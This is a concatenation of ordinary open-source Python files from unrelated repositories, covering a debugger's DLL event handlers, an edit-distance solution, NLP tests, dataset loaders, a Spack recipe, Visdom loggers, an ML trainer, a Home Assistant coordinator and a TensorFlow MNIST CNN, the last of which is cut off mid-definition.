self.__add_loaded_module(event)
return True
def _notify_load_dll(self, event):
"""
Notify the load of a new module.
This is done automatically by the L{Debug} class, you shouldn't need
to call it yourself.
@type event: L{LoadDLLEvent}
@param event: Load DLL event.
@rtype: bool
@return: C{True} to call the user-defined handle, C{False} otherwise.
"""
self.__add_loaded_module(event)
return True
def _notify_unload_dll(self, event):
"""
Notify the release of a loaded module.
This is done automatically by the L{Debug} class, you shouldn't need
to call it yourself.
@type event: L{UnloadDLLEvent}
@param event: Unload DLL event.
@rtype: bool
@return: C{True} to call the user-defined handle, C{False} otherwise.
"""
lpBaseOfDll = event.get_module_base()
## if self.has_module(lpBaseOfDll): # XXX this would trigger a scan
if lpBaseOfDll in self.__moduleDict:
self._del_module(lpBaseOfDll)
return True
|
src/zvt/factors/ma/domain/__init__.py | vishalbelsare/zvt | 2,032 | 11195093 | <reponame>vishalbelsare/zvt
# -*- coding: utf-8 -*-
# the __all__ is generated
__all__ = []
# __init__.py structure:
# common code of the package
# export interface in __all__ which contains __all__ of its sub modules
# import all from submodule stock_1d_ma_stats_factor
from .stock_1d_ma_stats_factor import *
from .stock_1d_ma_stats_factor import __all__ as _stock_1d_ma_stats_factor_all
__all__ += _stock_1d_ma_stats_factor_all
# import all from submodule stock_1d_ma_factor
from .stock_1d_ma_factor import *
from .stock_1d_ma_factor import __all__ as _stock_1d_ma_factor_all
__all__ += _stock_1d_ma_factor_all
# import all from submodule common
from .common import *
from .common import __all__ as _common_all
__all__ += _common_all
|
LeetCode/0072_Edit_Distance.py | Achyut-sudo/PythonAlgorithms | 144 | 11195109 | <reponame>Achyut-sudo/PythonAlgorithms
class Solution:
# @return an integer
def minDistance(self, word1, word2):
m=len(word1)
n=len(word2)
dp=[[0 for i in range(n+1)] for j in range(m+1)]
for i in range(m+1):
dp[i][0]=i
for j in range(n+1):
dp[0][j]=j
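        # DP recurrence (standard Levenshtein distance):
        #   dp[i][j] = dp[i-1][j-1]                   if word1[i-1] == word2[j-1]
        #   dp[i][j] = 1 + min(dp[i-1][j],    # delete a character from word1
        #                      dp[i][j-1],    # insert a character into word1
        #                      dp[i-1][j-1])  # replace a character, otherwise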
for i in range(1,m+1):
for j in range(1,n+1):
if word1[i-1]==word2[j-1]:
dp[i][j]=dp[i-1][j-1]
else:
dp[i][j]=min(dp[i-1][j]+1,dp[i][j-1]+1,dp[i-1][j-1]+1)
return dp[m][n]
test=Solution()
input1 = input("Enter string 1: ")
input2 = input("Enter string 2: ")
print(test.minDistance(input1, input2))
|
tests/test_word_vector.py | Gorlph/pythainlp | 569 | 11195124 | # -*- coding: utf-8 -*-
import unittest
from pythainlp import word_vector
from pythainlp.word_vector import WordVector
class TestWordVectorPackage(unittest.TestCase):
def test_thai2vec(self):
self.assertGreaterEqual(word_vector.similarity("แบคทีเรีย", "คน"), 0)
self.assertIsNotNone(word_vector.sentence_vectorizer(""))
self.assertIsNotNone(word_vector.get_model())
self.assertIsNotNone(
word_vector.sentence_vectorizer("เสรีภาพในการชุมนุม")
)
self.assertIsNotNone(
word_vector.sentence_vectorizer(
"เสรีภาพในการรวมตัว\nสมาคม", use_mean=True
)
)
self.assertIsNotNone(
word_vector.sentence_vectorizer("I คิด therefore I am ผ็ฎ์")
)
self.assertIsNotNone(
word_vector.most_similar_cosmul(
["สหรัฐอเมริกา", "ประธานาธิบดี"], ["ประเทศไทย"]
)[0][0]
)
self.assertEqual(
word_vector.doesnt_match(["ญี่ปุ่น", "พม่า", "ไอติม"]), "ไอติม"
)
_wv = WordVector("thai2fit_wv")
self.assertGreaterEqual(
_wv.similarity("แบคทีเรีย", "คน"), 0
)
self.assertIsNotNone(_wv.sentence_vectorizer(""))
self.assertIsNotNone(_wv.get_model())
self.assertIsNotNone(
_wv.sentence_vectorizer("เสรีภาพในการชุมนุม")
)
self.assertIsNotNone(
_wv.sentence_vectorizer(
"เสรีภาพในการรวมตัว\nสมาคม", use_mean=True
)
)
self.assertIsNotNone(
_wv.sentence_vectorizer("I คิด therefore I am ผ็ฎ์")
)
self.assertIsNotNone(
_wv.most_similar_cosmul(
["สหรัฐอเมริกา", "ประธานาธิบดี"], ["ประเทศไทย"]
)[0][0]
)
self.assertEqual(
_wv.doesnt_match(["ญี่ปุ่น", "พม่า", "ไอติม"]), "ไอติม"
)
def test_ltw2v(self):
_wv = WordVector("ltw2v")
self.assertGreaterEqual(
_wv.similarity("แบคทีเรีย", "คน"), 0
)
self.assertIsNotNone(_wv.sentence_vectorizer(""))
self.assertIsNotNone(_wv.get_model())
self.assertIsNotNone(
_wv.sentence_vectorizer("เสรีภาพในการชุมนุม")
)
self.assertIsNotNone(
_wv.sentence_vectorizer(
"เสรีภาพในการรวมตัว\nสมาคม", use_mean=True
)
)
self.assertIsNotNone(
_wv.sentence_vectorizer("I คิด therefore I am ผ็ฎ์")
)
self.assertIsNotNone(
_wv.most_similar_cosmul(
["สหรัฐอเมริกา", "ประธานาธิบดี"], ["ไทย"]
)[0][0]
)
self.assertEqual(
_wv.doesnt_match(["ญี่ปุ่น", "พม่า", "ไอติม"]), "ไอติม"
)
|
linmdtw/_version.py | lvlanson/linmdtw | 180 | 11195140 | __version__ = "0.1.6"
|
Methodology/C_CreateDatabase/moneymarkets_creator.py | MobileAir/FinanceDatabase | 1,014 | 11195151 | import json
import os
from tqdm import tqdm
def fill_data_points_moneymarkets(data_symbol, options=None):
if options is None:
options = {}
try:
options['short_name'] = data_symbol['quoteType']['shortName']
except (TypeError, KeyError):
options['short_name'] = None
try:
options['long_name'] = data_symbol['quoteType']['longName']
except (TypeError, KeyError):
options['long_name'] = None
try:
options['currency'] = data_symbol['price']['currency']
except (TypeError, KeyError):
options['currency'] = None
try:
options['market'] = data_symbol['quoteType']['market']
except (TypeError, KeyError):
options['market'] = None
try:
options['exchange'] = data_symbol['quoteType']['exchange']
except (TypeError, KeyError):
options['exchange'] = None
return options
def make_directories_and_fill_json_moneymarkets(data, directory_name):
try:
market_dictionaries = {}
symbols_dictionaries = {}
Errors = {}
os.mkdir(directory_name)
except FileExistsError:
return print(directory_name + " already exists. Please delete or rename the directory "
"before continuing")
print("Creating folder structure")
for symbol in tqdm(data):
options = fill_data_points_moneymarkets(data[symbol])
symbols_dictionaries[symbol] = options
try:
market = data[symbol]['quoteType']['market']
if market not in market_dictionaries and market is not None:
if len(market) > 0:
market_dictionaries[market] = {}
market_dictionaries[market][symbol] = options
except (TypeError, KeyError) as e:
Errors[symbol + ' Category'] = "Could not be categorized due to: " + str(e)
print('Filling folders with data..')
for market in tqdm(market_dictionaries.keys()):
market_new = market.replace('/', ' ')
with open(directory_name + '/' + market_new + '.json', 'w') as handle:
json.dump(market_dictionaries[market], handle, indent=4)
with open(directory_name + '/_' + directory_name + ".json", 'w') as handle:
json.dump(symbols_dictionaries, handle, indent=4)
print(f'Creating {directory_name} list..')
moneymarkets_list = {}
for moneymarket in tqdm(symbols_dictionaries):
if '.' not in moneymarket:
if symbols_dictionaries[moneymarket]['short_name'] is None:
continue
else:
moneymarkets_list[symbols_dictionaries[moneymarket]['short_name']] = moneymarket
with open(directory_name + '/_' + directory_name + " List.json", 'w') as handle:
json.dump(moneymarkets_list, handle, indent=4)
if Errors:
print("A couple of tickers were not able to be categorized. Please check the output of this function.")
return Errors
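# Example usage (illustrative sketch; the file name and the shape of `data` are
# assumptions -- `data` should map ticker symbols to the raw Yahoo Finance style
# dictionaries consumed by fill_data_points_moneymarkets):
#   with open("MoneyMarkets.json") as handle:
#       data = json.load(handle)
#   errors = make_directories_and_fill_json_moneymarkets(data, "Money Markets")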
|
common/vision/datasets/keypoint_detection/freihand.py | billzhonggz/Transfer-Learning-Library | 1,474 | 11195175 | """
@author: <NAME>
@contact: <EMAIL>
"""
import json
import time
import torch
import os
import os.path as osp
from torchvision.datasets.utils import download_and_extract_archive
from ...transforms.keypoint_detection import *
from .keypoint_dataset import Hand21KeypointDataset
from .util import *
""" General util functions. """
def _assert_exist(p):
    msg = 'File does not exist: %s' % p
assert os.path.exists(p), msg
def json_load(p):
_assert_exist(p)
with open(p, 'r') as fi:
d = json.load(fi)
return d
def load_db_annotation(base_path, set_name=None):
if set_name is None:
# only training set annotations are released so this is a valid default choice
set_name = 'training'
print('Loading FreiHAND dataset index ...')
t = time.time()
# assumed paths to data containers
k_path = os.path.join(base_path, '%s_K.json' % set_name)
mano_path = os.path.join(base_path, '%s_mano.json' % set_name)
xyz_path = os.path.join(base_path, '%s_xyz.json' % set_name)
# load if exist
K_list = json_load(k_path)
mano_list = json_load(mano_path)
xyz_list = json_load(xyz_path)
# should have all the same length
assert len(K_list) == len(mano_list), 'Size mismatch.'
assert len(K_list) == len(xyz_list), 'Size mismatch.'
print('Loading of %d samples done in %.2f seconds' % (len(K_list), time.time()-t))
return list(zip(K_list, mano_list, xyz_list))
def projectPoints(xyz, K):
""" Project 3D coordinates into image space. """
xyz = np.array(xyz)
K = np.array(K)
uv = np.matmul(K, xyz.T).T
return uv[:, :2] / uv[:, -1:]
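# For reference: projectPoints applies the standard pinhole camera model,
# [u, v, w]^T = K @ [X, Y, Z]^T, followed by perspective division (x, y) = (u/w, v/w).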
""" Dataset related functions. """
def db_size(set_name):
""" Hardcoded size of the datasets. """
if set_name == 'training':
        return 32560  # number of unique samples (they exist in multiple 'versions')
elif set_name == 'evaluation':
return 3960
else:
assert 0, 'Invalid choice.'
class sample_version:
gs = 'gs' # green screen
hom = 'hom' # homogenized
sample = 'sample' # auto colorization with sample points
auto = 'auto' # auto colorization without sample points: automatic color hallucination
db_size = db_size('training')
@classmethod
def valid_options(cls):
return [cls.gs, cls.hom, cls.sample, cls.auto]
@classmethod
def check_valid(cls, version):
msg = 'Invalid choice: "%s" (must be in %s)' % (version, cls.valid_options())
assert version in cls.valid_options(), msg
@classmethod
def map_id(cls, id, version):
cls.check_valid(version)
return id + cls.db_size*cls.valid_options().index(version)
class FreiHand(Hand21KeypointDataset):
"""`FreiHand Dataset <https://lmb.informatik.uni-freiburg.de/projects/freihand/>`_
Args:
root (str): Root directory of dataset
split (str, optional): The dataset split, supports ``train``, ``test``, or ``all``.
task (str, optional): The post-processing option to create dataset. Choices include ``'gs'``: green screen \
recording, ``'auto'``: auto colorization without sample points: automatic color hallucination, \
``'sample'``: auto colorization with sample points, ``'hom'``: homogenized, \
and ``'all'``: all hands. Default: 'all'.
download (bool, optional): If true, downloads the dataset from the internet and puts it \
in root directory. If dataset is already downloaded, it is not downloaded again.
transforms (callable, optional): A function/transform that takes in a dict (which contains PIL image and
its labels) and returns a transformed version. E.g, :class:`~common.vision.transforms.keypoint_detection.Resize`.
image_size (tuple): (width, height) of the image. Default: (256, 256)
heatmap_size (tuple): (width, height) of the heatmap. Default: (64, 64)
sigma (int): sigma parameter when generate the heatmap. Default: 2
.. note:: In `root`, there will exist following files after downloading.
::
*.json
training/
evaluation/
"""
def __init__(self, root, split='train', task='all', download=True, **kwargs):
if download:
if not osp.exists(osp.join(root, "training")) or not osp.exists(osp.join(root, "evaluation")):
download_and_extract_archive("https://lmb.informatik.uni-freiburg.de/data/freihand/FreiHAND_pub_v2.zip",
download_root=root, filename="FreiHAND_pub_v2.zip", remove_finished=False,
extract_root=root)
assert split in ['train', 'test', 'all']
self.split = split
assert task in ['all', 'gs', 'auto', 'sample', 'hom']
self.task = task
if task == 'all':
samples = self.get_samples(root, 'gs') + self.get_samples(root, 'auto') + self.get_samples(root, 'sample') + self.get_samples(root, 'hom')
else:
samples = self.get_samples(root, task)
random.seed(42)
random.shuffle(samples)
samples_len = len(samples)
samples_split = min(int(samples_len * 0.2), 3200)
if self.split == 'train':
samples = samples[samples_split:]
elif self.split == 'test':
samples = samples[:samples_split]
super(FreiHand, self).__init__(root, samples, **kwargs)
def __getitem__(self, index):
sample = self.samples[index]
image_name = sample['name']
image_path = os.path.join(self.root, image_name)
image = Image.open(image_path)
keypoint3d_camera = np.array(sample['keypoint3d']) # NUM_KEYPOINTS x 3
keypoint2d = np.array(sample['keypoint2d']) # NUM_KEYPOINTS x 2
intrinsic_matrix = np.array(sample['intrinsic_matrix'])
Zc = keypoint3d_camera[:, 2]
# Crop the images such that the hand is at the center of the image
# The images will be 1.5 times larger than the hand
# The crop process will change Xc and Yc, leaving Zc with no changes
bounding_box = get_bounding_box(keypoint2d)
w, h = image.size
left, upper, right, lower = scale_box(bounding_box, w, h, 1.5)
image, keypoint2d = crop(image, upper, left, lower - upper, right - left, keypoint2d)
# Change all hands to right hands
if sample['left'] is False:
image, keypoint2d = hflip(image, keypoint2d)
image, data = self.transforms(image, keypoint2d=keypoint2d, intrinsic_matrix=intrinsic_matrix)
keypoint2d = data['keypoint2d']
intrinsic_matrix = data['intrinsic_matrix']
keypoint3d_camera = keypoint2d_to_3d(keypoint2d, intrinsic_matrix, Zc)
        # normalize 2D pose:
visible = np.ones((self.num_keypoints, ), dtype=np.float32)
visible = visible[:, np.newaxis]
# 2D heatmap
target, target_weight = generate_target(keypoint2d, visible, self.heatmap_size, self.sigma, self.image_size)
target = torch.from_numpy(target)
target_weight = torch.from_numpy(target_weight)
# normalize 3D pose:
# put middle finger metacarpophalangeal (MCP) joint in the center of the coordinate system
# and make distance between wrist and middle finger MCP joint to be of length 1
keypoint3d_n = keypoint3d_camera - keypoint3d_camera[9:10, :]
keypoint3d_n = keypoint3d_n / np.sqrt(np.sum(keypoint3d_n[0, :] ** 2))
z = keypoint3d_n[:, 2]
meta = {
'image': image_name,
'keypoint2d': keypoint2d, # (NUM_KEYPOINTS x 2)
'keypoint3d': keypoint3d_n, # (NUM_KEYPOINTS x 3)
'z': z,
}
return image, target, target_weight, meta
def get_samples(self, root, version='gs'):
set = 'training'
# load annotations of this set
db_data_anno = load_db_annotation(root, set)
version_map = {
'gs': sample_version.gs,
'hom': sample_version.hom,
'sample': sample_version.sample,
'auto': sample_version.auto
}
samples = []
for idx in range(db_size(set)):
image_name = os.path.join(set, 'rgb',
'%08d.jpg' % sample_version.map_id(idx, version_map[version]))
mask_name = os.path.join(set, 'mask', '%08d.jpg' % idx)
intrinsic_matrix, mano, keypoint3d = db_data_anno[idx]
keypoint2d = projectPoints(keypoint3d, intrinsic_matrix)
sample = {
'name': image_name,
'mask_name': mask_name,
'keypoint2d': keypoint2d,
'keypoint3d': keypoint3d,
'intrinsic_matrix': intrinsic_matrix,
'left': False
}
samples.append(sample)
return samples
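# Example usage (illustrative sketch, not part of the original source; it assumes
# the base keypoint dataset class supplies a default transform pipeline):
#   dataset = FreiHand(root="data/freihand", split="train", task="gs", download=False)
#   image, target, target_weight, meta = dataset[0]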
|
var/spack/repos/builtin/packages/r-nada/package.py | LiamBindle/spack | 2,360 | 11195178 | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RNada(RPackage):
"""Nondetects and Data Analysis for Environmental Data
Contains methods described by <NAME> in his book "Nondetects And
Data Analysis: Statistics for Censored Environmental Data"."""
homepage = "https://cloud.r-project.org/package=NADA"
url = "https://cloud.r-project.org/src/contrib/NADA_1.6-1.1.tar.gz"
list_url = "https://cloud.r-project.org/src/contrib/Archive/NADA"
version('1.6-1.1', sha256='670ff6595ba074ed0a930b7a09624d5ef20616379a20e768c1a7b37332aee44a')
depends_on('[email protected]:', type=('build', 'run'))
depends_on('r-survival', type=('build', 'run'))
|
torchnet/logger/visdomlogger.py | HarshTrivedi/tnt | 1,463 | 11195179 | """ Logging to Visdom server """
import numpy as np
import visdom
from .logger import Logger
class BaseVisdomLogger(Logger):
'''
The base class for logging output to Visdom.
***THIS CLASS IS ABSTRACT AND MUST BE SUBCLASSED***
Note that the Visdom server is designed to also handle a server architecture,
and therefore the Visdom server must be running at all times. The server can
be started with
$ python -m visdom.server
and you probably want to run it from screen or tmux.
'''
@property
def viz(self):
return self._viz
def __init__(self, fields=None, win=None, env=None, opts={}, port=8097, server="localhost"):
super(BaseVisdomLogger, self).__init__(fields)
self.win = win
self.env = env
self.opts = opts
self._viz = visdom.Visdom(server="http://" + server, port=port)
def log(self, *args, **kwargs):
raise NotImplementedError(
"log not implemented for BaseVisdomLogger, which is an abstract class.")
def _viz_prototype(self, vis_fn):
''' Outputs a function which will log the arguments to Visdom in an appropriate way.
Args:
vis_fn: A function, such as self.vis.image
'''
def _viz_logger(*args, **kwargs):
self.win = vis_fn(*args,
win=self.win,
env=self.env,
opts=self.opts,
**kwargs)
return _viz_logger
def log_state(self, state):
""" Gathers the stats from self.trainer.stats and passes them into
self.log, as a list """
results = []
for field_idx, field in enumerate(self.fields):
parent, stat = None, state
for f in field:
parent, stat = stat, stat[f]
results.append(stat)
self.log(*results)
class VisdomSaver(object):
''' Serialize the state of the Visdom server to disk.
    Unless you have a fancy schedule, where different environments are saved with different frequencies,
you probably only need one of these.
'''
def __init__(self, envs=None, port=8097, server="localhost"):
super(VisdomSaver, self).__init__()
self.envs = envs
self.viz = visdom.Visdom(server="http://" + server, port=port)
def save(self, *args, **kwargs):
self.viz.save(self.envs)
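    # Example (assumes a Visdom server is running; added here for illustration):
    #   saver = VisdomSaver(envs=['main'])
    #   saver.save()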
class VisdomLogger(BaseVisdomLogger):
'''
A generic Visdom class that works with the majority of Visdom plot types.
'''
def __init__(self, plot_type, fields=None, win=None, env=None, opts={}, port=8097, server="localhost"):
'''
Args:
fields: Currently unused
plot_type: The name of the plot type, in Visdom
Examples:
>>> # Image example
>>> img_to_use = skimage.data.coffee().swapaxes(0,2).swapaxes(1,2)
>>> image_logger = VisdomLogger('image')
>>> image_logger.log(img_to_use)
>>> # Histogram example
>>> hist_data = np.random.rand(10000)
            >>> hist_logger = VisdomLogger('histogram', opts=dict(title='Random!', numbins=20))
>>> hist_logger.log(hist_data)
'''
super(VisdomLogger, self).__init__(fields, win, env, opts, port, server)
self.plot_type = plot_type
self.chart = getattr(self.viz, plot_type)
self.viz_logger = self._viz_prototype(self.chart)
def log(self, *args, **kwargs):
self.viz_logger(*args, **kwargs)
class VisdomPlotLogger(BaseVisdomLogger):
def __init__(self, plot_type, fields=None, win=None, env=None, opts={}, port=8097, server="localhost", name=None):
'''
Multiple lines can be added to the same plot with the "name" attribute (see example)
Args:
fields: Currently unused
plot_type: {scatter, line}
Examples:
>>> scatter_logger = VisdomPlotLogger('line')
>>> scatter_logger.log(stats['epoch'], loss_meter.value()[0], name="train")
>>> scatter_logger.log(stats['epoch'], loss_meter.value()[0], name="test")
'''
super(VisdomPlotLogger, self).__init__(fields, win, env, opts, port, server)
valid_plot_types = {
"scatter": self.viz.scatter,
"line": self.viz.line}
self.plot_type = plot_type
# Set chart type
if plot_type not in valid_plot_types.keys():
raise ValueError("plot_type \'{}\' not found. Must be one of {}".format(
plot_type, valid_plot_types.keys()))
self.chart = valid_plot_types[plot_type]
def log(self, *args, **kwargs):
if self.win is not None and self.viz.win_exists(win=self.win, env=self.env):
if len(args) != 2:
raise ValueError("When logging to {}, must pass in x and y values (and optionally z).".format(
type(self)))
x, y = args
self.chart(
X=np.array([x]),
Y=np.array([y]),
update='append',
win=self.win,
env=self.env,
opts=self.opts,
**kwargs)
else:
if self.plot_type == 'scatter':
chart_args = {'X': np.array([args])}
else:
chart_args = {'X': np.array([args[0]]),
'Y': np.array([args[1]])}
self.win = self.chart(
win=self.win,
env=self.env,
opts=self.opts,
**chart_args)
# For some reason, the first point is a different trace. So for now
# we can just add the point again, this time on the correct curve.
self.log(*args, **kwargs)
class VisdomTextLogger(BaseVisdomLogger):
'''Creates a text window in visdom and logs output to it.
    The output can be formatted with fancy HTML, and new output can
be set to 'append' or 'replace' mode.
Args:
fields: Currently not used
update_type: One of {'REPLACE', 'APPEND'}. Default 'REPLACE'.
    For the examples below, make sure that your Visdom server is running.
Example:
>>> notes_logger = VisdomTextLogger(update_type='APPEND')
>>> for i in range(10):
>>> notes_logger.log("Printing: {} of {}".format(i+1, 10))
# results will be in Visdom environment (default: http://localhost:8097)
'''
valid_update_types = ['REPLACE', 'APPEND']
def __init__(self, fields=None, win=None, env=None, opts={}, update_type=valid_update_types[0],
port=8097, server="localhost"):
super(VisdomTextLogger, self).__init__(fields, win, env, opts, port, server)
self.text = ''
if update_type not in self.valid_update_types:
raise ValueError("update type '{}' not found. Must be one of {}".format(
update_type, self.valid_update_types))
self.update_type = update_type
self.viz_logger = self._viz_prototype(self.viz.text)
def log(self, msg, *args, **kwargs):
text = msg
if self.update_type == 'APPEND' and self.text:
self.text = "<br>".join([self.text, text])
else:
self.text = text
self.viz_logger([self.text])
def _log_all(self, stats, log_fields, prefix=None, suffix=None, require_dict=False):
results = []
for field_idx, field in enumerate(self.fields):
parent, stat = None, stats
for f in field:
parent, stat = stat, stat[f]
name, output = self._gather_outputs(field, log_fields,
parent, stat, require_dict)
if not output:
continue
self._align_output(field_idx, output)
results.append((name, output))
if not results:
return
output = self._join_results(results)
if prefix is not None:
self.log(prefix)
self.log(output)
if suffix is not None:
self.log(suffix)
def _align_output(self, field_idx, output):
for output_idx, o in enumerate(output):
if len(o) < self.field_widths[field_idx][output_idx]:
num_spaces = self.field_widths[field_idx][output_idx] - len(o)
output[output_idx] += ' ' * num_spaces
else:
self.field_widths[field_idx][output_idx] = len(o)
def _join_results(self, results):
joined_out = map(lambda i: (i[0], ' '.join(i[1])), results)
joined_fields = map(lambda i: '{}: {}'.format(i[0], i[1]), joined_out)
return '\t'.join(joined_fields)
def _gather_outputs(self, field, log_fields, stat_parent, stat, require_dict=False):
output = []
name = ''
if isinstance(stat, dict):
log_fields = stat.get(log_fields, [])
name = stat.get('log_name', '.'.join(field))
for f in log_fields:
output.append(f.format(**stat))
elif not require_dict:
name = '.'.join(field)
number_format = stat_parent.get('log_format', '')
unit = stat_parent.get('log_unit', '')
fmt = '{' + number_format + '}' + unit
output.append(fmt.format(stat))
return name, output
|
mmf/trainers/mmf_trainer.py | sisilmehta2000/mmf | 3,252 | 11195200 | <filename>mmf/trainers/mmf_trainer.py
# Copyright (c) Facebook, Inc. and its affiliates.
import logging
import warnings
import omegaconf
import torch
from mmf.common.registry import registry
from mmf.datasets.multi_datamodule import MultiDataModule
from mmf.modules.metrics import Metrics
from mmf.trainers.base_trainer import BaseTrainer
from mmf.trainers.callbacks.checkpoint import CheckpointCallback
from mmf.trainers.callbacks.early_stopping import EarlyStoppingCallback
from mmf.trainers.callbacks.logistics import LogisticsCallback
from mmf.trainers.callbacks.lr_scheduler import LRSchedulerCallback
from mmf.trainers.core.callback_hook import TrainerCallbackHookMixin
from mmf.trainers.core.device import TrainerDeviceMixin
from mmf.trainers.core.evaluation_loop import TrainerEvaluationLoopMixin
from mmf.trainers.core.profiling import TrainerProfilingMixin
from mmf.trainers.core.training_loop import TrainerTrainingLoopMixin
from mmf.utils.build import build_model, build_optimizer
from mmf.utils.general import print_model_parameters
from omegaconf import DictConfig, OmegaConf
from packaging import version
logger = logging.getLogger(__name__)
@registry.register_trainer("mmf")
class MMFTrainer(
TrainerCallbackHookMixin,
TrainerTrainingLoopMixin,
TrainerDeviceMixin,
TrainerEvaluationLoopMixin,
TrainerProfilingMixin,
BaseTrainer,
):
def __init__(self, config: DictConfig):
super().__init__(config)
def load(self):
super().load()
self.load_fp16_scaler()
# Callbacks
self.on_init_start()
        # Parallelize model
self.parallelize_model()
# Callbacks
self.on_init_end()
def configure_callbacks(self):
self.checkpoint_callback = CheckpointCallback(self.config, self)
self.early_stop_callback = EarlyStoppingCallback(self.config, self)
self.logistics_callback = LogisticsCallback(self.config, self)
self.lr_scheduler_callback = LRSchedulerCallback(self.config, self)
# Reset callbacks as they are class variables and would be shared between
# multiple interactive shell calls to `run`
self.callbacks = []
# Add callbacks for execution during events
self.callbacks.append(self.lr_scheduler_callback)
# checkpoint_callback needs to be called after lr_scheduler_callback so that
# lr_scheduler_callback._scheduler.step() happens before saving checkpoints
# (otherwise the saved last_epoch in scheduler would be wrong)
self.callbacks.append(self.checkpoint_callback)
self.callbacks.append(self.logistics_callback)
# Add all customized callbacks defined by users
for callback in self.config.training.get("callbacks", []):
callback_type = callback.type
callback_param = callback.params
callback_cls = registry.get_callback_class(callback_type)
self.callbacks.append(callback_cls(self.config, self, **callback_param))
def load_datasets(self):
logger.info("Loading datasets")
self.dataset_loader = MultiDataModule(self.config)
self.train_loader = self.dataset_loader.train_dataloader()
self.val_loader = self.dataset_loader.val_dataloader()
self.test_loader = self.dataset_loader.test_dataloader()
def load_model(self):
logger.info("Loading model")
if self.config.model in self.config.model_config:
attributes = self.config.model_config[self.config.model]
else:
warnings.warn(
f"Model {self.config.model}'s config not present. "
+ "Continuing with empty config"
)
attributes = OmegaConf.create()
# Easy way to point to config for other model
if isinstance(attributes, str):
attributes = self.config.model_config[attributes]
with omegaconf.open_dict(attributes):
attributes.model = self.config.model
self.model = build_model(attributes)
self.model = self.model.to(self.device)
def load_optimizer(self):
logger.info("Loading optimizer")
self.optimizer = build_optimizer(self.model, self.config)
def load_metrics(self) -> None:
logger.info("Loading metrics")
metrics = self.config.evaluation.get("metrics", [])
self.metrics = Metrics(metrics)
self.metrics_params = self.metrics.required_params
def load_fp16_scaler(self):
if self.training_config.fp16:
assert version.parse(torch.__version__) >= version.parse(
"1.6"
), f"Using fp16 requires torch version >- 1.6, found: {torch.__version__}"
assert self.device != torch.device("cpu"), "fp16 cannot be used on cpu"
set_torch_grad_scaler = True
if self.training_config.fp16 and self.distributed:
try:
from fairscale.optim.grad_scaler import ShardedGradScaler
from fairscale.optim.oss import OSS
if isinstance(self.optimizer, OSS):
self.scaler = ShardedGradScaler()
set_torch_grad_scaler = False
logger.info("Using FairScale ShardedGradScaler")
except ImportError:
logger.info("Using Pytorch AMP GradScaler")
if set_torch_grad_scaler:
self.scaler = torch.cuda.amp.GradScaler(enabled=self.training_config.fp16)
def train(self):
logger.info("===== Model =====")
logger.info(self.model)
print_model_parameters(self.model)
if "train" in self.run_type:
self.on_train_start()
self.training_loop()
self.on_train_end()
self.inference()
self.finalize()
def inference(self):
dataset_type = []
if "val" in self.run_type:
dataset_type.append("val")
if any(rt in self.run_type for rt in ["inference", "test", "predict"]):
dataset_type.append("test")
for dataset in dataset_type:
if self.config.evaluation.predict:
self.on_prediction_start()
self.prediction_loop(dataset)
self.on_prediction_end()
else:
self.on_test_start()
logger.info(f"Starting inference on {dataset} set")
report, meter = self.evaluation_loop(dataset, use_tqdm=True)
self.on_test_end(report=report, meter=meter)
def finalize(self):
self.dataset_loader.teardown()
self.teardown()
|
homeassistant/components/steamist/coordinator.py | MrDelik/core | 30,023 | 11195207 | """DataUpdateCoordinator for steamist."""
from __future__ import annotations
from datetime import timedelta
import logging
from aiosteamist import Steamist, SteamistStatus
from homeassistant.core import HomeAssistant
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator
_LOGGER = logging.getLogger(__name__)
class SteamistDataUpdateCoordinator(DataUpdateCoordinator[SteamistStatus]):
"""DataUpdateCoordinator to gather data from a steamist steam shower."""
def __init__(
self,
hass: HomeAssistant,
client: Steamist,
host: str,
device_name: str | None,
) -> None:
"""Initialize DataUpdateCoordinator to gather data for specific steamist."""
self.client = client
self.device_name = device_name
super().__init__(
hass,
_LOGGER,
name=f"Steamist {host}",
update_interval=timedelta(seconds=5),
)
async def _async_update_data(self) -> SteamistStatus:
"""Fetch data from steamist."""
return await self.client.async_get_status()
|
src/out/ICFP18evaluation/evaluationCNN/TensorFlow/TensorFlow.py | faradaym/Lantern | 158 | 11195218 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A deep MNIST classifier using convolutional layers.
See extensive documentation at
https://www.tensorflow.org/get_started/mnist/pros
"""
# Disable linter warnings to maintain consistency with tutorial.
# pylint: disable=invalid-name
# pylint: disable=g-bad-import-order
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import sys
import tempfile
import time
from tensorflow.examples.tutorials.mnist import input_data
import tensorflow as tf
#FLAGS = None
def deepnn(x):
"""deepnn builds the graph for a deep net for classifying digits.
Args:
x: an input tensor with the dimensions (N_examples, 784), where 784 is the
number of pixels in a standard MNIST image.
Returns:
A tuple (y, keep_prob). y is a tensor of shape (N_examples, 10), with values
equal to the logits of classifying the digit into one of 10 classes (the
digits 0-9). keep_prob is a scalar placeholder for the probability of
dropout.
"""
# Reshape to use within a convolutional neural net.
# Last dimension is for "features" - there is only one here, since images are
# grayscale -- it would be 3 for an RGB image, 4 for RGBA, etc.
with tf.name_scope('reshape'):
x_image = tf.reshape(x, [-1, 28, 28, 1])
  # First convolutional layer - maps one grayscale image to 10 feature maps.
with tf.name_scope('conv1'):
W_conv1 = weight_variable([5, 5, 1, 10])
h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1))
# Pooling layer - downsamples by 2X.
with tf.name_scope('pool1'):
h_pool1 = max_pool_2x2(h_conv1)
  # Second convolutional layer -- maps 10 feature maps to 20.
with tf.name_scope('conv2'):
W_conv2 = weight_variable([5, 5, 10, 20])
h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2))
# Second pooling layer.
with tf.name_scope('pool2'):
h_pool2 = max_pool_2x2(h_conv2)
  # Fully connected layer 1 -- after two rounds of 5x5 VALID convolution and 2x2
  # pooling (28 -> 24 -> 12 -> 8 -> 4), the 28x28 image is down to 4x4x20 feature
  # maps -- maps this to 50 features.
